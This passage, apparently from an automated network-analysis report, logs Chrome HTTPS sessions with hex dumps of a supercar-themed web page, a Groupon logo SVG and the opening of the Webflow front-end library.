                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 34 33 61 34 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69
                                                                                                                                                                                                        Data Ascii: olor: white; padding: 150px 0; text-align: center; } .content-section { padding: 60px 0; } .footer { background: #343a40; color: white; paddi
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 71 75 61 6e 74 75 6d 73 70 69 72 65 6c 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 71 75 61 6e 74 75 6d 73 70 69 72 65 6c 2e 72 75 2f 23 73 65 72 76 69 63 65 73 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73
                                                                                                                                                                                                        Data Ascii: ref="https://quantumspirel.ru/#about">About</a> </li> <li class="nav-item"> <a class="nav-link" href="https://quantumspirel.ru/#services">Services</a> </li> <li class
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 35 35 35 2d 30 37 35 2d 30 35 39 30 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 54 68 65 20 6c 65 61 64 20 63 61 72 20 69 73 20 75 6e 69 71 75 65 2c 20 65 78 63 65 70 74 20 66 6f 72 20 74 68 65 20 6f 6e 65 20 62 65 68 69 6e 64 20 69 74 20 77 68 69 63 68 20 69 73 20 69 64 65 6e 74 69 63 61 6c 2e 20 2d 20 4d 75 72 72 61 79 20 57 61 6c 6b 65 72 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 6c 6f 63
                                                                                                                                                                                                        Data Ascii: rotected]</span></a> or call us at 555-075-0590.</p> <blockquote class="blockquote"> <p class="mb-0">The lead car is unique, except for the one behind it which is identical. - Murray Walker</p> </bloc
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 22 3e 45 78 70 6c 6f 72 65 20 74 68 65 20 6c 61 74 65 73 74 20 61 6e 64 20 67 72 65 61 74 65 73 74 20 69 6e 20 73 75 70 65 72 63 61 72 20 74 65 63 68 6e 6f 6c 6f 67 79 2c 20 70 65 72 66 6f 72 6d 61 6e 63 65 2c 20 61 6e 64 20 64 65 73 69 67 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 71 75 61 6e 74 75 6d 73 70 69 72 65 6c 2e 72 75 2f 23 6d 6f 64 65 72 6e 2d 73 75 70 65 72 63 61 72 73 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e
                                                                                                                                                                                                        Data Ascii: Modern Supercars</h5> <p class="card-text">Explore the latest and greatest in supercar technology, performance, and design.</p> <a href="https://quantumspirel.ru/#modern-supercars" class="btn btn-primary">
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC702INData Raw: 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 71 75 61 6e 74 75 6d 73 70 69 72 65 6c 2e 72 75 2f 23 74 65 72 6d 73 22 3e 54 65 72 6d 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 71 75 61 6e 74 75 6d 73 70 69 72 65 6c 2e 72 75 2f 23 66 61 71 22 3e 46 41 51 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: /li> <li class="list-inline-item"> <a href="https://quantumspirel.ru/#terms">Terms</a> </li> <li class="list-inline-item"> <a href="https://quantumspirel.ru/#faq">FAQ</a>
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        57192.168.2.549813104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC775OUTGET /images/groupon.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 3474
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "d92-620aa1d20756b"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=brVVWS3L5GgKuKmanRZ5Vq5G0ZC1Uc9rphS%2FS7PAbvxclePf8rKZwbHlDcVN8xXWtLgRBz2tdpoGQ7yrT9JrbPUodZ9eScgl2TaEkiYlZ97WPV%2BODNfrXIxF9X6qwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615aeab0c4257-EWR
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC622INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 33 2e 30 2e 34 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30 29 20 20 2d 2d 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 3d 22 30 70 78 22 20 79 3d 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 23.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 73 74 30 22 20 64 3d 22 4d 31 32 38 30 2e 35 2c 32 33 2e 33 63 2d 32 30 2d 31 34 2e 31 2d 34 33 2e 37 2d 31 36 2e 32 2d 37 34 2e 39 2d 31 36 2e 32 68 2d 39 38 2e 32 56 33 30 33 68 37 32 2e 34 76 2d 39 35 2e 33 68 32 30 2e 38 63 33 30 2e 38 2c 30 2c 35 34 2e 31 2d 32 2e 31 2c 37 32 2e 39 2d 31 33 2e 33 0a 09 09 63 32 39 2e 35 2d 31 37 2e 39 2c 34 37 2d 34 39 2e 35 2c 34 37 2d 38 37 2e 38 43 31 33 32 30 2e 35 2c 36 39 2e 35 2c 31 33 30 36 2e 38 2c 34 31 2e 36 2c 31 32 38 30 2e 35 2c 32 33 2e 33 7a 20 4d 31 31 39 34 2c 31 34 33 2e 36 68 2d 31 33 2e 33 56 37 33 2e 33 68 31 39 2e 31 63 33 32 2e 31 2c 30 2c 34 37 2e 35 2c 31 30 2c 34 37 2e 35 2c 33 34 2e 35 0a 09 09 43 31 32 34 37 2e 32 2c 31 33 34 2e 34 2c 31 32 32 39 2e 38 2c 31 34 33 2e 36 2c 31 31 39 34 2c
                                                                                                                                                                                                        Data Ascii: st0" d="M1280.5,23.3c-20-14.1-43.7-16.2-74.9-16.2h-98.2V303h72.4v-95.3h20.8c30.8,0,54.1-2.1,72.9-13.3c29.5-17.9,47-49.5,47-87.8C1320.5,69.5,1306.8,41.6,1280.5,23.3z M1194,143.6h-13.3V73.3h19.1c32.1,0,47.5,10,47.5,34.5C1247.2,134.4,1229.8,143.6,1194,
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 31 39 2e 36 48 31 33 33 2e 39 76 35 39 2e 31 68 38 34 2e 35 63 2d 31 34 2e 36 2c 32 35 2e 38 2d 33 39 2e 31 2c 34 30 2d 36 36 2e 36 2c 34 30 63 2d 34 30 2e 38 2c 30 2d 37 37 2e 34 2d 33 36 2e 32 2d 37 37 2e 34 2d 38 33 2e 33 63 30 2d 34 32 2e 35 2c 33 34 2e 31 2d 37 37 2e 38 2c 37 37 2e 34 2d 37 37 2e 38 0a 09 09 63 32 33 2e 33 2c 30 2c 34 32 2e 34 2c 39 2e 36 2c 36 30 2e 38 2c 32 38 2e 37 48 32 39 35 63 2d 32 33 2e 37 2d 36 33 2e 33 2d 37 39 2e 31 2d 31 30 32 2d 31 34 32 2e 33 2d 31 30 32 63 2d 34 32 2c 30 2d 37 38 2e 36 2c 31 35 2d 31 30 37 2e 38 2c 34 33 2e 37 43 31 35 2e 38 2c 37 33 2e 35 2c 30 2c 31 31 31 2c 30 2c 31 35 31 2e 38 0a 09 09 43 2d 30 2e 31 2c 31 39 35 2e 36 2c 31 34 2c 32 33 32 2e 32 2c 34 31 2e 39 2c 32 36 31 2e 38 7a 22 2f 3e 0a 09 3c
                                                                                                                                                                                                        Data Ascii: 19.6H133.9v59.1h84.5c-14.6,25.8-39.1,40-66.6,40c-40.8,0-77.4-36.2-77.4-83.3c0-42.5,34.1-77.8,77.4-77.8c23.3,0,42.4,9.6,60.8,28.7H295c-23.7-63.3-79.1-102-142.3-102c-42,0-78.6,15-107.8,43.7C15.8,73.5,0,111,0,151.8C-0.1,195.6,14,232.2,41.9,261.8z"/><
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC114INData Raw: 35 2d 34 2e 31 2c 30 2e 35 68 2d 33 2e 39 76 2d 38 2e 39 68 33 2e 37 63 32 2e 34 2c 30 2c 34 2e 31 2c 30 2e 33 2c 35 2e 32 2c 30 2e 39 73 31 2e 36 2c 31 2e 38 2c 31 2e 36 2c 33 2e 36 43 31 39 34 34 2e 32 2c 31 39 2e 32 2c 31 39 34 33 2e 33 2c 32 30 2e 35 2c 31 39 34 31 2e 37 2c 32 31 2e 31 7a 22 2f 3e 0a 3c 2f 67 3e 0a 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                        Data Ascii: 5-4.1,0.5h-3.9v-8.9h3.7c2.4,0,4.1,0.3,5.2,0.9s1.6,1.8,1.6,3.6C1944.2,19.2,1943.3,20.5,1941.7,21.1z"/></g></svg>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        58192.168.2.549814104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC710OUTGET /js/webflow.js HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:06 GMT
                                                                                                                                                                                                        etag: W/"a099d-620aa1d2900f4-gzip"
                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a2q46aycSfM8dBxLggk6of7wn1EpBQl3W8W9Zwy%2FptGYzkeQL0E6aSURGFEqMX%2F094oMl9QibPeFonFpNIDfnIUtlPc%2F8fjToZoJHQ6T65T4Dw7MVdUDX5x%2FYnqO5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615aebc145e64-EWR
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC593INData Raw: 37 63 39 61 0d 0a 0a 2f 2a 21 0a 20 2a 20 57 65 62 66 6c 6f 77 3a 20 46 72 6f 6e 74 2d 65 6e 64 20 73 69 74 65 20 6c 69 62 72 61 72 79 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 4d 49 54 0a 20 2a 20 49 6e 6c 69 6e 65 20 73 63 72 69 70 74 73 20 6d 61 79 20 61 63 63 65 73 73 20 74 68 65 20 61 70 69 20 75 73 69 6e 67 20 61 6e 20 61 73 79 6e 63 20 68 61 6e 64 6c 65 72 3a 0a 20 2a 20 20 20 76 61 72 20 57 65 62 66 6c 6f 77 20 3d 20 57 65 62 66 6c 6f 77 20 7c 7c 20 5b 5d 3b 0a 20 2a 20 20 20 57 65 62 66 6c 6f 77 2e 70 75 73 68 28 72 65 61 64 79 46 75 6e 63 74 69 6f 6e 29 3b 0a 20 2a 2f 0a 0a 28 28 29 3d 3e 7b 76 61 72 20 63 77 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3b 76 61 72 20 6b 69 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3b 76 61 72
                                                                                                                                                                                                        Data Ascii: 7c9a/*! * Webflow: Front-end site library * @license MIT * Inline scripts may access the api using an async handler: * var Webflow = Webflow || []; * Webflow.push(readyFunction); */(()=>{var cw=Object.create;var ki=Object.defineProperty;var
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 66 6f 72 28 6c 65 74 20 69 20 6f 66 20 66 77 28 74 29 29 21 64 77 2e 63 61 6c 6c 28 65 2c 69 29 26 26 69 21 3d 3d 72 26 26 6b 69 28 65 2c 69 2c 7b 67 65 74 3a 28 29 3d 3e 74 5b 69 5d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 28 6e 3d 68 77 28 74 2c 69 29 29 7c 7c 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 3b 72 65 74 75 72 6e 20 65 7d 3b 76 61 72 20 6d 65 3d 28 65 2c 74 2c 72 29 3d 3e 28 72 3d 65 21 3d 6e 75 6c 6c 3f 63 77 28 70 77 28 65 29 29 3a 7b 7d 2c 69 68 28 74 7c 7c 21 65 7c 7c 21 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 6b 69 28 72 2c 22 64 65 66 61 75 6c 74 22 2c 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 7d 29 3a 72 2c 65 29 29 2c 64 74 3d 65 3d 3e 69 68 28 6b 69 28 7b 7d 2c 22 5f
                                                                                                                                                                                                        Data Ascii: f t=="function")for(let i of fw(t))!dw.call(e,i)&&i!==r&&ki(e,i,{get:()=>t[i],enumerable:!(n=hw(t,i))||n.enumerable});return e};var me=(e,t,r)=>(r=e!=null?cw(pw(e)):{},ih(t||!e||!e.__esModule?ki(r,"default",{value:e,enumerable:!0}):r,e)),dt=e=>ih(ki({},"_
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 5a 5b 4d 5d 3d 73 65 5b 4d 5d 2c 50 74 3d 63 65 5b 4d 5d 3d 6e 65 5b 4d 5d 3d 6e 65 77 20 5a 3b 72 65 74 75 72 6e 20 50 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 2c 6e 65 2e 6d 69 78 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 6a 65 29 7b 72 65 74 75 72 6e 20 63 65 5b 4d 5d 3d 6e 65 5b 4d 5d 3d 61 65 28 6e 65 2c 6a 65 29 5b 4d 5d 2c 6e 65 7d 2c 6e 65 2e 6f 70 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 6a 65 29 7b 69 66 28 68 65 3d 7b 7d 2c 55 28 6a 65 29 3f 68 65 3d 6a 65 2e 63 61 6c 6c 28 6e 65 2c 50 74 2c 5f 65 2c 6e 65 2c 73 65 29 3a 59 28 6a 65 29 26 26 28 68 65 3d 6a 65 29 2c 59 28 68 65 29 29 66 6f 72 28 76 61 72 20 4d 6e 20 69 6e 20 68 65 29 6a 2e 63 61 6c 6c 28 68 65 2c 4d 6e 29 26 26 28 50 74 5b 4d 6e 5d 3d 68 65 5b 4d 6e 5d 29 3b 72 65 74 75 72 6e 20 55
                                                                                                                                                                                                        Data Ascii: Z[M]=se[M],Pt=ce[M]=ne[M]=new Z;return Pt.constructor=ne,ne.mixin=function(je){return ce[M]=ne[M]=ae(ne,je)[M],ne},ne.open=function(je){if(he={},U(je)?he=je.call(ne,Pt,_e,ne,se):Y(je)&&(he=je),Y(he))for(var Mn in he)j.call(he,Mn)&&(Pt[Mn]=he[Mn]);return U
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 34 35 2c 20 30 2e 30 34 35 2c 20 30 2e 33 35 35 2c 20 31 29 22 2c 66 75 6e 63 74 69 6f 6e 28 4d 2c 6a 2c 57 2c 59 29 7b 72 65 74 75 72 6e 28 4d 2f 3d 59 2f 32 29 3c 31 3f 57 2f 32 2a 4d 2a 4d 2a 4d 2b 6a 3a 57 2f 32 2a 28 28 4d 2d 3d 32 29 2a 4d 2a 4d 2b 32 29 2b 6a 7d 5d 2c 22 65 61 73 65 2d 69 6e 2d 71 75 61 72 74 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 38 39 35 2c 20 30 2e 30 33 30 2c 20 30 2e 36 38 35 2c 20 30 2e 32 32 30 29 22 2c 66 75 6e 63 74 69 6f 6e 28 4d 2c 6a 2c 57 2c 59 29 7b 72 65 74 75 72 6e 20 57 2a 28 4d 2f 3d 59 29 2a 4d 2a 4d 2a 4d 2b 6a 7d 5d 2c 22 65 61 73 65 2d 6f 75 74 2d 71 75 61 72 74 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 36 35 2c 20 30 2e
                                                                                                                                                                                                        Data Ascii: ["cubic-bezier(0.645, 0.045, 0.355, 1)",function(M,j,W,Y){return(M/=Y/2)<1?W/2*M*M*M+j:W/2*((M-=2)*M*M+2)+j}],"ease-in-quart":["cubic-bezier(0.895, 0.030, 0.685, 0.220)",function(M,j,W,Y){return W*(M/=Y)*M*M*M+j}],"ease-out-quart":["cubic-bezier(0.165, 0.
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 32 2c 2d 31 30 2a 4d 2f 59 29 2b 31 29 2b 6a 7d 5d 2c 22 65 61 73 65 2d 69 6e 2d 6f 75 74 2d 65 78 70 6f 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 31 2c 20 30 2c 20 30 2c 20 31 29 22 2c 66 75 6e 63 74 69 6f 6e 28 4d 2c 6a 2c 57 2c 59 29 7b 72 65 74 75 72 6e 20 4d 3d 3d 3d 30 3f 6a 3a 4d 3d 3d 3d 59 3f 6a 2b 57 3a 28 4d 2f 3d 59 2f 32 29 3c 31 3f 57 2f 32 2a 4d 61 74 68 2e 70 6f 77 28 32 2c 31 30 2a 28 4d 2d 31 29 29 2b 6a 3a 57 2f 32 2a 28 2d 4d 61 74 68 2e 70 6f 77 28 32 2c 2d 31 30 2a 2d 2d 4d 29 2b 32 29 2b 6a 7d 5d 2c 22 65 61 73 65 2d 69 6e 2d 63 69 72 63 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 30 30 2c 20 30 2e 30 34 30 2c 20 30 2e 39 38 30 2c 20 30 2e 33 33 35 29 22 2c 66 75 6e 63 74 69 6f 6e 28 4d 2c 6a 2c 57 2c 59 29
                                                                                                                                                                                                        Data Ascii: 2,-10*M/Y)+1)+j}],"ease-in-out-expo":["cubic-bezier(1, 0, 0, 1)",function(M,j,W,Y){return M===0?j:M===Y?j+W:(M/=Y/2)<1?W/2*Math.pow(2,10*(M-1))+j:W/2*(-Math.pow(2,-10*--M)+2)+j}],"ease-in-circ":["cubic-bezier(0.600, 0.040, 0.980, 0.335)",function(M,j,W,Y)
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 64 7c 74 75 72 6e 29 24 2f 2c 43 3d 22 75 6e 69 74 6c 65 73 73 22 2c 4c 3d 2f 28 61 6c 6c 7c 6e 6f 6e 65 29 20 30 73 20 65 61 73 65 20 30 73 2f 2c 44 3d 2f 5e 28 77 69 64 74 68 7c 68 65 69 67 68 74 29 24 2f 2c 41 3d 22 20 22 2c 71 3d 70 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 2c 4f 3d 5b 22 57 65 62 6b 69 74 22 2c 22 4d 6f 7a 22 2c 22 4f 22 2c 22 6d 73 22 5d 2c 46 3d 5b 22 2d 77 65 62 6b 69 74 2d 22 2c 22 2d 6d 6f 7a 2d 22 2c 22 2d 6f 2d 22 2c 22 2d 6d 73 2d 22 5d 2c 56 3d 66 75 6e 63 74 69 6f 6e 28 4d 29 7b 69 66 28 4d 20 69 6e 20 71 2e 73 74 79 6c 65 29 72 65 74 75 72 6e 7b 64 6f 6d 3a 4d 2c 63 73 73 3a 4d 7d 3b 76 61 72 20 6a 2c 57 2c 59 3d 22 22 2c 55 3d 4d 2e 73 70 6c 69 74 28 22 2d 22 29 3b 66 6f 72 28 6a 3d 30 3b 6a 3c 55 2e 6c 65
                                                                                                                                                                                                        Data Ascii: d|turn)$/,C="unitless",L=/(all|none) 0s ease 0s/,D=/^(width|height)$/,A=" ",q=p.createElement("a"),O=["Webkit","Moz","O","ms"],F=["-webkit-","-moz-","-o-","-ms-"],V=function(M){if(M in q.style)return{dom:M,css:M};var j,W,Y="",U=M.split("-");for(j=0;j<U.le
